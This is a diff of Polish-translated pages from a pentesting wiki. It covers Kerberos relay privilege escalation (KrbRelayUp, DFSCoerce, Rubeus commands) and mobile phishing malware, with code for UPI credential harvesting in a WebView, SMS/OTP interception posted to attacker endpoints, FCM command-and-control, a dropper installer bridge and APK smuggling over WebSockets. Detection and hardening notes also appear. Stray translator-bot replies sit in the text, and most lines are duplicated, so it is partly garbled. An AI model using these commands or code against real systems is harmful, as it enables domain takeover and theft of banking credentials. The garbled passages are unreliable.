3. **Możesz przechwycić lub wymusić uwierzytelnienie:** LLMNR/NBNS poison, DNS spoof, **PetitPotam / DFSCoerce RPC**, fałszywy AuthIP, rogue DCOM, itd.
4. **Źródło biletu nie zostało już użyte:** wygrywasz wyścig, zanim prawdziwy pakiet dotrze lub blokujesz go całkowicie; w przeciwnym razie pamięć podręczna serwera odtwarza zdarzenie 4649.
5. Musisz w jakiś sposób być w stanie przeprowadzić **MitM w komunikacji**, być może będąc częścią grupy DNSAmins, aby zmodyfikować DNS domeny lub mieć możliwość zmiany pliku HOST ofiary.
1. **Shared key:** source and target SPNs belong to the same computer account (default on Windows servers).
2. **No channel protection:** SMB/LDAP signing off and EPA off for HTTP/LDAPS.
3. **You can intercept or coerce authentication:** LLMNR/NBNS poison, DNS spoof, **PetitPotam / DFSCoerce RPC**, fake AuthIP, rogue DCOM, etc..
4. **Ticket source not already used:** you win the race before the real packet hits or block it entirely; otherwise the servers replay cache fires Event 4649.
5. You need to somehow be able to perform a **MitM in the communication** maybe being part of the DNSAmins group to modify the DNS of the domain or being able to change the HOST file of the victim.
### Kroki ataku Kerberos Relay
### Kerberos Relay Steps
- 3.1 **Rozpoznanie hosta**
- 3.1 **Recon the host**
```powershell
# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName
```
- 3.2 **Uruchom nasłuchiwacz przekazywania**
- 3.2 **Uruchom relay listener**
[KrbRelayUp](https://github.com/Dec0ne/KrbRelayUp)
```powershell
# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8
```
`KrbRelayUp` łączy **KrbRelay → LDAP → RBCD → Rubeus → SCM bypass** w jednym pliku binarnym.
`KrbRelayUp` pakuje **KrbRelay → LDAP → RBCD → Rubeus → SCM bypass** w jednym binarnym pliku.
- 3.3 **Wymuszenie uwierzytelnienia Kerberos**
- 3.3 **Wymuszanie Kerberos auth**
```powershell
# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50
```
DFSCoerce sprawia, że DC wysyła do nas bilet Kerberos `CIFS/DC01`.
DFSCoerce powoduje, że DC wysyła do nas bilet Kerberos `CIFS/DC01`.
- 3.4 **Przekaż AP-REQ**
- 3.4 **Relay the AP-REQ**
KrbRelay wyodrębnia blob GSS z SMB, pakuje go ponownie w bind LDAP i przesyła do `ldap://DC01`—uwierzytelnienie się udaje, ponieważ **ten sam klucz** go deszyfruje.
KrbRelay wyodrębnia GSS blob z SMB, opakowuje go w LDAP bind i przekazuje do `ldap://DC01`—uwierzytelnianie kończy się sukcesem, ponieważ **ten sam klucz** go odszyfrowuje.
- 3.5 **Wykorzystaj LDAP ➜ RBCD ➜ SYSTEM**
- 3.5 **Abuse LDAP ➜ RBCD ➜ SYSTEM**
```powershell
# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
@ -184,47 +245,59 @@ KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe
```
You now own **NT AUTHORITY\SYSTEM**.
Teraz posiadasz **NT AUTHORITY\SYSTEM**.
### **Więcej ścieżek, które warto znać**
| Wektor | Sztuczka | Dlaczego to ma znaczenie |
### **Więcej ścieżek wartych poznania**
| Vector | Trick | Why it matters |
|--------|-------|----------------|
| **AuthIP / IPSec** | Fałszywy serwer wysyła **ładunek GSS-ID** z dowolnym SPN; klient buduje AP-REQ bezpośrednio do ciebie | Działa nawet w różnych podsieciach; domyślne poświadczenia maszyny |
| **DCOM / MSRPC** | Złośliwy resolver OXID zmusza klienta do uwierzytelnienia do dowolnego SPN i portu | Czyste *lokalne* podniesienie uprawnień; omija zaporę |
| **AD CS Web Enroll** | Przekaż bilet maszyny do `HTTP/CA` i zdobądź certyfikat, następnie **PKINIT** do wyprodukowania TGT | Omija zabezpieczenia podpisywania LDAP |
| **Shadow Credentials** | Zapisz `msDS-KeyCredentialLink`, następnie PKINIT z fałszywą parą kluczy | Nie ma potrzeby dodawania konta komputera |
| **AuthIP / IPSec** | Fałszywy serwer wysyła **GSS-ID payload** z dowolnym SPN; klient buduje AP-REQ bezpośrednio do Ciebie | Działa nawet między podsieciami; machine creds domyślnie |
| **DCOM / MSRPC** | Złośliwy OXID resolver zmusza klienta do uwierzytelnienia się na dowolny SPN i port | Pure *local* priv-esc; omija firewall |
| **AD CS Web Enroll** | Relay machine ticket do `HTTP/CA` i zdobądź cert, potem **PKINIT** by wykonać mint TGTs | Omija mechanizmy podpisywania LDAP |
| **Shadow Credentials** | Zapisz `msDS-KeyCredentialLink`, potem PKINIT z podrobioną parą kluczy | Brak konieczności dodawania konta komputerowego |
### **Rozwiązywanie problemów**
| Błąd | Znaczenie | Naprawa |
| Error | Meaning | Fix |
|-------|---------|-----|
| `KRB_AP_ERR_MODIFIED` | Klucz biletu ≠ klucz docelowy | Zły host/SPN |
| `KRB_AP_ERR_MODIFIED` | Ticket key ≠ target key | Zły host/SPN |
| `KRB_AP_ERR_SKEW` | Zegar > 5 min różnicy | Synchronizuj czas lub użyj `w32tm` |
| Niepowodzenie bindowania LDAP | Wymuszone podpisywanie | Użyj ścieżki AD CS lub wyłącz podpisywanie |
| Spam zdarzeń 4649 | Usługa zauważyła duplikat Authenticator | zablokuj lub wyściguj oryginalny pakiet |
| LDAP bind fails | Wymuszono podpisywanie | Użyj ścieżki AD CS lub wyłącz podpisywanie |
| Event 4649 spam | Usługa wykryła zduplikowany Authenticator | zablokuj lub 'race' oryginalny pakiet |
### **Wykrywanie**
* Wzrost w **Zdarzeniu 4769** dla `CIFS/`, `HTTP/`, `LDAP/` z tego samego źródła w ciągu kilku sekund.
* **Zdarzenie 4649** na usłudze wskazuje na wykrycie powtórzenia.
* Logowanie Kerberos z **127.0.0.1** (przekazywanie do lokalnego SCM) jest bardzo podejrzane—mapuj za pomocą reguły Sigma w dokumentach KrbRelayUp.
* Obserwuj zmiany w atrybutach `msDS-AllowedToActOnBehalfOfOtherIdentity` lub `msDS-KeyCredentialLink`.
* Wzrost liczby **Event 4769** dla `CIFS/`, `HTTP/`, `LDAP/` z tego samego źródła w ciągu kilku sekund.
* **Event 4649** na usłudze wskazuje na wykryte replay.
* Logon Kerberos z **127.0.0.1** (relay do lokalnego SCM) jest wysoce podejrzany — zmapuj za pomocą reguły Sigma w dokumentacji KrbRelayUp.
* Monitoruj zmiany atrybutów `msDS-AllowedToActOnBehalfOfOtherIdentity` lub `msDS-KeyCredentialLink`.
## **Wzmacnianie zabezpieczeń**
## **Wzmocnienie zabezpieczeń**
1. **Wymuś podpisywanie LDAP i SMB + EPA** na każdym serwerze.
2. **Podziel SPN** tak, aby HTTP nie było na tym samym koncie co CIFS/LDAP.
3. Łatki dla wektorów przymusu (PetitPotam KB5005413, DFS, AuthIP).
4. Ustaw **`ms-DS-MachineAccountQuota = 0`** aby zatrzymać nieautoryzowane dołączenia komputerów.
5. Powiadamiaj o **Zdarzeniu 4649** i nieoczekiwanych logowaniach Kerberos z pętli zwrotnej.
2. **Rozdziel SPN-y** tak, aby HTTP nie było na tym samym koncie co CIFS/LDAP.
3. Załatuj wektory przymusu (PetitPotam KB5005413, DFS, AuthIP).
4. Ustaw **`ms-DS-MachineAccountQuota = 0`** aby zatrzymać przyłączanie się nieautoryzowanych komputerów.
5. Generuj alerty dla **Event 4649** i nieoczekiwanych logonów Kerberos na loopback.
## Odniesienia
## Źródła
- [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
- [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
- [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
- [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
- [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
- [WSUS Is SUS: NTLM Relay Attacks in Plain Sight (TrustedSec)](https://trustedsec.com/blog/wsus-is-sus-ntlm-relay-attacks-in-plain-sight)
- [GoSecure Abusing WSUS to enable NTLM relaying attacks](https://gosecure.ai/blog/2021/11/22/gosecure-investigates-abusing-windows-server-update-services-wsus-to-enable-ntlm-relaying-attacks)
- [Impacket PR #2034 Restore HTTP server in ntlmrelayx](https://github.com/fortra/impacket/pull/2034)
- [Impacket PR #913 HTTP relay support](https://github.com/fortra/impacket/pull/913)
- [WSUScripts wsusniff.py](https://github.com/Coontzy1/WSUScripts/blob/main/wsusniff.py)
- [WSUScripts wsuspider.sh](https://github.com/Coontzy1/WSUScripts/blob/main/wsuspider.sh)
- [MS-WSUSOD Windows Server Update Services: Server-to-Client Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wsusod/e00a5e81-c600-40d9-96b5-9cab78364416)
- [Microsoft WSUS deprecation announcement](https://techcommunity.microsoft.com/blog/windows-itpro-blog/windows-server-update-services-wsus-deprecation/4250436)
{{#include ../../banners/hacktricks-training.md}}

253
src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
View File

@ -3,65 +3,65 @@
{{#include ../../banners/hacktricks-training.md}}
> [!INFO]
> Ta strona opisuje techniki używane przez aktorów zagrożeń do dystrybucji **malicious Android APKs** i **iOS mobile-configuration profiles** poprzez phishing (SEO, social engineering, fake stores, dating apps, etc.).
> Materiał jest adaptacją kampanii SarangTrap ujawnionej przez Zimperium zLabs (2025) oraz innych publicznych badań.
> Ta strona opisuje techniki używane przez threat actors do dystrybucji **malicious Android APKs** oraz **iOS mobile-configuration profiles** przez phishing (SEO, social engineering, fałszywe sklepy, aplikacje randkowe itp.).
> Materiał został zaadaptowany z kampanii SarangTrap ujawnionej przez Zimperium zLabs (2025) oraz innych publicznych badań.
## Przebieg ataku
## Attack Flow
1. **SEO/Phishing Infrastructure**
* Zarejestruj dziesiątki podobnych domen (dating, cloud share, car service…).
Użyj lokalnych słów kluczowych i emoji w elemencie `<title>`, aby poprawić pozycję w Google.
Hostuj *zarówno* Android (`.apk`) jak i instrukcje instalacji iOS na tej samej stronie docelowej.
2. **Pobranie w pierwszym etapie**
Użyj słów kluczowych w lokalnym języku i emoji w elemencie `<title>`, aby lepiej pozycjonować się w Google.
Hostuj *zarówno* instrukcje instalacji Android (`.apk`), jak i iOS na tej samej landing page.
2. **First Stage Download**
* Android: bezpośredni link do *unsigned* lub „third-party store” APK.
* iOS: `itms-services://` lub zwykły link HTTPS do złośliwego **mobileconfig** profilu (patrz niżej).
* iOS: `itms-services://` lub zwykły link HTTPS do złośliwego **mobileconfig** profile (patrz niżej).
3. **Post-install Social Engineering**
* Przy pierwszym uruchomieniu aplikacja prosi o **kod zaproszenia / weryfikacji** (iluzja ekskluzywnego dostępu).
* Przy pierwszym uruchomieniu aplikacja prosi o **invitation / verification code** (iluzja dostępu wyłącznie dla zaproszonych).
* Kod jest **POSTed over HTTP** do Command-and-Control (C2).
* C2 odpowiada `{"success":true}` ➜ malware kontynuuje działanie.
* Analiza dynamiczna Sandbox / AV, która nigdy nie wysyła prawidłowego kodu, nie zobaczy **żadnego złośliwego zachowania** (ewazja).
* Sandbox / AV dynamic analysis, które nigdy nie przesyła prawidłowego kodu, nie widzi **żadnego złośliwego zachowania** (ewazja).
4. **Runtime Permission Abuse** (Android)
* Niebezpieczne uprawnienia są żądane dopiero **po pozytywnej odpowiedzi C2**:
* Dangerous permissions są żądane dopiero **po pozytywnej odpowiedzi z C2**:
```xml
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<!-- Older builds also asked for SMS permissions -->
```
* Nowsze warianty **usuwają `<uses-permission>` dla SMS z `AndroidManifest.xml`** ale pozostawiają ścieżkę w Java/Kotlin, która czyta SMS przez reflection ⇒ obniża to wynik w analizie statycznej, a nadal działa na urządzeniach, które przyznały uprawnienie przez nadużycie `AppOps` lub na starszych celach.
5. Fasadowy UI i zbieranie w tle
* Aplikacja pokazuje nieszkodliwe widoki (przeglądarka SMS, wybieracz galerii) zaimplementowane lokalnie.
* W międzyczasie exfiltruje:
* Nowsze warianty **usuwają `<uses-permission>` dla SMS z `AndroidManifest.xml`** ale zostawiają ścieżkę w Java/Kotlin, która odczytuje SMS przez reflection ⇒ obniża to wynik w analizie statycznej, a nadal działa na urządzeniach, które przyznały uprawnienie przez `AppOps` abuse lub są starszymi celami.
5. **Facade UI & Background Collection**
* Aplikacja pokazuje niegroźne widoki (SMS viewer, gallery picker) zaimplementowane lokalnie.
* W międzyczasie eksfiltruje:
- IMEI / IMSI, numer telefonu
- Pełny zrzut `ContactsContract` (JSON array)
- JPEG/PNG z `/sdcard/DCIM` skompresowane za pomocą [Luban](https://github.com/Curzibn/Luban) w celu zmniejszenia rozmiaru
- Opcjonalna zawartość SMS (`content://sms`)
Dane ładunku**batch-zipped** i wysyłane przez `HTTP POST /upload.php`.
- Pełny zrzut `ContactsContract` (tablica JSON)
- JPEG/PNG z `/sdcard/DCIM` skompresowane z użyciem [Luban](https://github.com/Curzibn/Luban) w celu zmniejszenia rozmiaru
- Opcjonalnie treść SMS (`content://sms`)
Payloady**batch-zipped** i wysyłane przez `HTTP POST /upload.php`.
6. **iOS Delivery Technique**
* Pojedynczy **mobile-configuration profile** może zażądać `PayloadType=com.apple.sharedlicenses`, `com.apple.managedConfiguration` itd., aby zarejestrować urządzenie w nadzorze podobnym do „MDM”.
* Jeden **mobile-configuration profile** może żądać `PayloadType=com.apple.sharedlicenses`, `com.apple.managedConfiguration` itp., aby zapisać urządzenie w nadzorowaniu podobnym do “MDM”.
* Instrukcje social-engineeringowe:
1. Otwórz Ustawienia*Profile downloaded*.
1. Otwórz Settings*Profile downloaded*.
2. Stuknij *Install* trzy razy (zrzuty ekranu na stronie phishingowej).
3. Zaufaj niepodpisanemu profilowi ➜ atakujący zyskuje uprawnienia *Contacts* & *Photo* bez przeglądu App Store.
7. Warstwa sieciowa
* Zwykły HTTP, często na porcie 80 z nagłówkiem HOST takim jak `api.<phishingdomain>.com`.
7. **Network Layer**
* Zwykły HTTP, często na porcie 80 z HOST header typu `api.<phishingdomain>.com`.
* `User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; Pixel 6 Build/TQ3A.230805.001)` (brak TLS → łatwe do wykrycia).
## Porady dla testów defensywnych / Red-Team
## Defensive Testing / Red-Team Tips
* **Dynamic Analysis Bypass** Podczas oceny malware zautomatyzuj fazę kodu zaproszenia przy użyciu Frida/Objection, aby dotrzeć do złośliwej gałęzi.
* **Manifest vs. Runtime Diff** Porównaj `aapt dump permissions` z runtime `PackageManager#getRequestedPermissions()`; brakujące niebezpieczne permisy to czerwona flaga.
* **Network Canary** Skonfiguruj `iptables -p tcp --dport 80 -j NFQUEUE` aby wykryć nietypowe nagłe wysyły POST po wpisaniu kodu.
* **mobileconfig Inspection** Użyj `security cms -D -i profile.mobileconfig` na macOS, aby wylistow`PayloadContent` i wykryć nadmierne uprawnienia.
* **Dynamic Analysis Bypass** Podczas oceny malware zintegruj automatyzację fazy kodu zaproszenia z Frida/Objection, aby dotrzeć do złośliwej gałęzi.
* **Manifest vs. Runtime Diff** Porównaj `aapt dump permissions` z runtime `PackageManager#getRequestedPermissions()`; brakujące dangerous perms to czerwony flag.
* **Network Canary** Skonfiguruj `iptables -p tcp --dport 80 -j NFQUEUE` do wykrywania nieregularnych POST burstów po wprowadzeniu kodu.
* **mobileconfig Inspection** Użyj `security cms -D -i profile.mobileconfig` na macOS, aby wypis`PayloadContent` i wykryć nadmierne uprawnienia.
## Pomysły wykrywania dla Blue Team
## Blue-Team Detection Ideas
* **Certificate Transparency / DNS Analytics** aby wychwycić nagłe pojawianie się domen bogatych w słowa kluczowe.
* **User-Agent & Path Regex**: `(?i)POST\s+/(check|upload)\.php` z klientów Dalvik spoza Google Play.
* **Invite-code Telemetry** POST 68 cyfrowych kodów numerycznych krótko po instalacji APK może wskazywać na staging.
* **MobileConfig Signing** Blokuj niepodpisane profile konfiguracyjne za pomocą polityki MDM.
* **Certificate Transparency / DNS Analytics** do wykrywania nagłych wysypek domen bogatych w słowa kluczowe.
* **User-Agent & Path Regex**: `(?i)POST\s+/(check|upload)\.php` od Dalvik klientów spoza Google Play.
* **Invite-code Telemetry** POSTy 68 cyfrowych kodów numerycznych krótko po instalacji APK mo wskazywać na staging.
* **MobileConfig Signing** Blokuj unsigned configuration profiles za pomocą polityki MDM.
## Przydatny fragment Frida: Automatyczne ominięcie kodu zaproszenia
## Useful Frida Snippet: Auto-Bypass Invitation Code
```python
# frida -U -f com.badapp.android -l bypass.js --no-pause
# Hook HttpURLConnection write to always return success
@ -90,28 +90,28 @@ LubanCompress 1.1.8 # "Luban" string inside classes.dex
## Android WebView Payment Phishing (UPI) Dropper + FCM C2 Pattern
This pattern has been observed in campaigns abusing government-benefit themes to steal Indian UPI credentials and OTPs. Operators chain reputable platforms for delivery and resilience.
Wzorzec ten był obserwowany w kampaniach wykorzystujących tematy dotyczące świadczeń rządowych w celu kradzieży indyjskich danych UPI i OTP. Operatorzy łączą renomowane platformy, aby zapewnić dostawę i zwiększyć odporność.
### Łańcuch dostaw przez zaufane platformy
- Wabik wideo na YouTube → opis zawiera krótki link
- Krótki link → strona phishingowa na GitHub Pages podszywająca się pod oryginalny portal
- To samo repo GitHub hostuje APK z fałszywą plakietką “Google Play”, linkującą bezpośrednio do pliku
- Dynamiczne strony phishingowe działają na Replit; zdalny kanał poleceń używa Firebase Cloud Messaging (FCM)
### Delivery chain across trusted platforms
- YouTube video lure → w opisie znajduje się krótki link
- Krótki link → strona phishingowa na GitHub Pages podszywająca się pod oficjalny portal
- To samo repozytorium GitHub hostuje APK z fałszywą plakietką “Google Play” linkującą bezpośrednio do pliku
- Dynamiczne strony phishingowe działają na Replit; kanał zdalnych poleceń korzysta z Firebase Cloud Messaging (FCM)
### Dropper with embedded payload and offline install
- Pierwszy APK to installer (dropper), który dostarcza rzeczywiste malware pod `assets/app.apk` i prosi użytkownika o wyłączenie WiFi/danych mobilnych, aby osłabić wykrywanie w chmurze.
- The embedded payload instaluje się pod niewinną etykietą (np. “Secure Update”). Po instalacji zarówno installer, jak i payload są obecne jako oddzielne aplikacje.
- Pierwszy APK to installer (dropper), który dostarcza prawdziwe malware w `assets/app.apk` i prosi użytkownika o wyłączenie WiFi/danych mobilnych, aby osłabić wykrywanie w chmurze.
- The embedded payload instaluje się pod niewinną nazwą (np. “Secure Update”). Po instalacji zarówno installer, jak i payload są obecne jako oddzielne aplikacje.
Static triage tip (grep for embedded payloads):
Wskazówka do triage statycznego (grep for embedded payloads):
```bash
unzip -l sample.apk | grep -i "assets/app.apk"
# Or:
zipgrep -i "classes|.apk" sample.apk | head
```
### Dynamiczne odkrywanie endpointów przez shortlink
- Malware pobiera listę w plain-text, rozdzieloną przecinkami, aktywnych endpointów z shortlink; proste transformacje stringów tworzą końcową ścieżkę strony phishing.
### Dynamic endpoint discovery via shortlink
- Malware pobiera z shortlinka listę aktywnych endpointów w postaci zwykłego tekstu, rozdzielaną przecinkami; proste przekształcenia ciągów znaków tworzą końcową ścieżkę strony phishing.
Przykład (zredagowany):
Przykład (ocenzurowany):
```
GET https://rebrand.ly/dclinkto2
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
@ -127,8 +127,8 @@ String upiPage = parts[0].replace("gate.html", "gate.htm");
String smsPost = parts[1];
String credsPost = upiPage.replace("gate.htm", "addup.php");
```
### WebView-based wyłudzanie poświadczeń UPI
- Krok „Wykonaj płatność ₹1 / UPILite” ładuje złośliwy formularz HTML z dynamicznego endpointu wewnątrz WebView i przechwytuje pola wrażliwe (telefon, bank, UPI PIN), które są `POST`owane do `addup.php`.
### Pozyskiwanie poświadczeń UPI oparte na WebView
- Krok „Wykonaj płatność ₹1 / UPILite” ładuje złośliwy formularz HTML z dynamicznego endpointa wewnątrz WebView i przechwytuje pola wrażliwe (telefon, bank, UPI PIN), które są `POST`owane do `addup.php`.
Minimalny loader:
```java
@ -136,16 +136,16 @@ WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm
```
### Self-propagation and SMS/OTP interception
- Na pierwszym uruchomieniu żądane są agresywne uprawnienia:
### Samopropagacja oraz przechwytywanie SMS/OTP
- Na pierwszym uruchomieniu aplikacja żąda agresywnych uprawnień:
```xml
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
```
- Kontakty są przetwarzane w pętli, aby masowo wysyłać smishing SMS-y z urządzenia ofiary.
- Przychodzące SMS-y są przechwytywane przez broadcast receiver i przesyłane wraz z metadanymi (sender, body, SIM slot, per-device random ID) do `/addsm.php`.
- Kontakty są przeglądane w pętli w celu masowego wysyłania smishing SMS-ów z urządzenia ofiary.
- Przychodzące SMS-y są przechwytywane przez broadcast receiver i przesyłane wraz z metadanymi (nadawca, treść, slot SIM, losowy identyfikator przypisany do urządzenia) do `/addsm.php`.
Szkic odbiornika:
```java
@ -162,9 +162,9 @@ postForm(urlAddSms, new FormBody.Builder()
}
```
### Firebase Cloud Messaging (FCM) jako odporny C2
- Payload rejestruje się w FCM; push messages niosą pole `_type` używane jako przełącznik do wyzwalania akcji (np. aktualizacja szablonów tekstów phishing, przełączanie zachowań).
- payload rejestruje się w FCM; push messages zawierają pole `_type` używane jako przełącznik do uruchamiania akcji (np. aktualizacja szablonów tekstów phishingowych, przełączanie zachowań).
Przykładowy FCM payload:
Przykładowy payload FCM:
```json
{
"to": "<device_fcm_token>",
@ -174,7 +174,7 @@ Przykładowy FCM payload:
}
}
```
Szkic handlera:
Handler szkic:
```java
@Override
public void onMessageReceived(RemoteMessage msg){
@ -188,27 +188,67 @@ case "smish": sendSmishToContacts(); break;
```
### Wzorce wykrywania i IOCs
- APK zawiera dodatkowy payload w `assets/app.apk`
- WebView ładuje płatność z `gate.htm` i eksfiltrowuje do `/addup.php`
- Eksfiltracja SMS-ów do `/addsm.php`
- Pobieranie konfiguracji uruchamiane przez shortlink (np. `rebrand.ly/*`) zwracające endpointy w formacie CSV
- Aplikacje oznaczone jako ogólne „Update/Secure Update”
- Wiadomości FCM `data` z polem `_type` w niezaufanych aplikacjach
- WebView wczytuje płatność z `gate.htm` i exfiltrates do `/addup.php`
- SMS exfiltration do `/addsm.php`
- Pobieranie konfiguracji sterowane shortlinkiem (np. `rebrand.ly/*`) zwracające CSV endpoints
- Aplikacje oznaczone ogólnie “Update/Secure Update”
- Wiadomości FCM `data` z dyskryminatorem `_type` w niezaufanych aplikacjach
### Pomysły na wykrywanie i obronę
- Oznaczaj aplikacje, które instruują użytkowników, aby wyłączyli sieć podczas instalacji, a następnie side-loadują drugi APK z `assets/`.
- Generuj alert na krotkę uprawnień: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + przepływy płatności oparte o WebView.
- Monitorowanie egressu dla `POST /addup.php|/addsm.php` na hostach niekorporacyjnych; blokuj znaną infrastrukturę.
- Reguły Mobile EDR: niezaufana aplikacja rejestrująca się do FCM i rozgałęziająca się na podstawie pola `_type`.
### Pomysły wykrywania i obrony
- Oznacz aplikacje, które instruują użytkowników, by wyłączyli sieć podczas instalacji, a następnie side-loadują drugi APK z `assets/`.
- Generuj alert dla krotki uprawnień: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + przepływów płatności opartych na WebView.
- Monitorowanie egress dla `POST /addup.php|/addsm.php` na hostach spoza środowiska korporacyjnego; blokuj znaną infrastrukturę.
- Reguły Mobile EDR: aplikacja niezaufana rejestrująca się w FCM i rozgałęziająca się na podstawie pola `_type`.
---
## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration studium przypadku RatOn
## Socket.IO/WebSocket-based APK Smuggling + Fałszywe strony Google Play
Kampania RatOn banker/RAT (ThreatFabric) jest konkretnym przykładem, jak współczesne operacje phishingu mobilnego łączą WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), przejęcie portfela kryptowalut i nawet orkiestrację NFC-relay. Ta sekcja wyodrębnia techniki nadające się do ponownego użycia.
Atakujący coraz częściej zastępują statyczne linki do APK kanałem Socket.IO/WebSocket osadzonym w wabikach wyglądających jak Google Play. To ukrywa payload URL, omija filtry URL/rozszerzeń i zachowuje realistyczny UX instalacji.
### Stage-1: WebView → natywny most instalacyjny (dropper)
Typowy przepływ klienta obserwowany w praktyce:
```javascript
// Open Socket.IO channel and request payload
const socket = io("wss://<lure-domain>/ws", { transports: ["websocket"] });
socket.emit("startDownload", { app: "com.example.app" });
Atakujący prezentują WebView wskazujący na złośliwą stronę i wstrzykują interfejs JavaScript, który udostępnia natywny instalator. Stuknięcie przycisku HTML wywołuje kod natywny, który instaluje APK drugiego etapu dołączony w assets droppera, a następnie bezpośrednio go uruchamia.
// Accumulate binary chunks and drive fake Play progress UI
const chunks = [];
socket.on("chunk", (chunk) => chunks.push(chunk));
socket.on("downloadProgress", (p) => updateProgressBar(p));
// Assemble APK clientside and trigger browser save dialog
socket.on("downloadComplete", () => {
const blob = new Blob(chunks, { type: "application/vnd.android.package-archive" });
const url = URL.createObjectURL(blob);
const a = document.createElement("a");
a.href = url; a.download = "app.apk"; a.style.display = "none";
document.body.appendChild(a); a.click();
});
```
Dlaczego omija proste kontrole:
- Brak statycznego URL APK; payload jest rekonstruowany w pamięci z ramek WebSocket.
- Filtry URL/MIME/rozszerzeń, które blokują bezpośrednie odpowiedzi .apk, mogą przeoczyć dane binarne tunelowane przez WebSockets/Socket.IO.
- Crawlery i sandboksy URL, które nie wykonują WebSockets, nie pobiorą payloadu.
Pomysły na wykrywanie i detekcję:
- Web/network telemetry: oznacz sesje WebSocket, które przesyłają duże kawałki binarne, po których następuje utworzenie Blob z MIME application/vnd.android.package-archive i programatyczne kliknięcie `<a download>`. Szukaj ciągów klienckich takich jak socket.emit('startDownload'), oraz eventów o nazwach chunk, downloadProgress, downloadComplete w skryptach strony.
- Play-store spoof heuristics: na domenach niebędących Google serwujących strony przypominające Play, szukaj Google Play UI strings takich jak http.html:"VfPpkd-jY41G-V67aGc", szablonów mieszanych języków oraz fałszywych „verification/progress” przepływów sterowanych przez zdarzenia WS.
- Kontrole: blokuj dostarczanie APK z non-Google originów; egzekwuj polityki MIME/rozszerzeń obejmujące ruch WebSocket; zachowaj przeglądarkowe monity o bezpiecznym pobieraniu.
See also WebSocket tradecraft and tooling:
{{#ref}}
../../pentesting-web/websocket-attacks.md
{{#endref}}
## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration Studium przypadku RatOn
Kampania RatOn banker/RAT (ThreatFabric) jest konkretnym przykładem, jak nowoczesne operacje mobile phishing łączą WebView droppers, Accessibility-driven automatyzację UI, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), przejęcie crypto wallet oraz nawet orkiestrację NFC-relay. Ta sekcja abstrahuje techniki nadające się do ponownego użycia.
### Etap-1: WebView → native install bridge (dropper)
Atakujący prezentują WebView wskazujący na złośliwą stronę i wstrzykują interfejs JavaScript, który udostępnia native installer. Kliknięcie przycisku HTML wywołuje native code, który instaluje APK drugiego etapu dołączony do assets droppera i następnie uruchamia go bezpośrednio.
Minimalny wzorzec:
```java
@ -239,23 +279,23 @@ wv.loadUrl("https://attacker.site/install.html");
}
}
```
Nie widzę zawartości pliku. Proszę wklej tutaj HTML/Markdown z pliku src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md, a przetłumaczę odpowiedni angielski tekst na polski, zachowując dokładnie wszystkie tagi, linki, ścieżki, kod oraz markdown/html.
Proszę wklej HTML/treść strony (zawartość pliku src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md), którą mam przetłumaczyć na polski.
```html
<button onclick="bridge.installApk()">Install</button>
```
Po instalacji dropper uruchamia payload za pomocą explicit package/activity:
Po instalacji dropper uruchamia payload za pomocą jawnego package/activity:
```java
Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);
```
Hunting idea: nieufne aplikacje wywołujące `addJavascriptInterface()` i udostępniające WebView metody przypominające instalator; APK zawierający osadzony secondary payload w `assets/` i wywołujący Package Installer Session API.
Pomysł na wykrywanie: niezaufane aplikacje wywołujące `addJavascriptInterface()` i ujawniające metody podobne do instalatora dla WebView; APK zawierające osadzony wtórny ładunek w `assets/` i wywołujące Package Installer Session API.
### Consent funnel: Accessibility + Device Admin + follow-on runtime prompts
Stage-2 otwiera WebView, który hostuje stronę “Access”. Jej przycisk wywołuje eksportowaną metodę, która nawiguję ofiarę do ustawień Accessibility i prosi o włączenie złośliwej usługi. Po przyznaniu malware używa Accessibility, aby automatycznie przejść przez kolejne runtime permission dialogs (contacts, overlay, manage system settings, etc.) i żąda Device Admin.
### Lejek zgody: Accessibility + Device Admin + follow-on runtime prompts
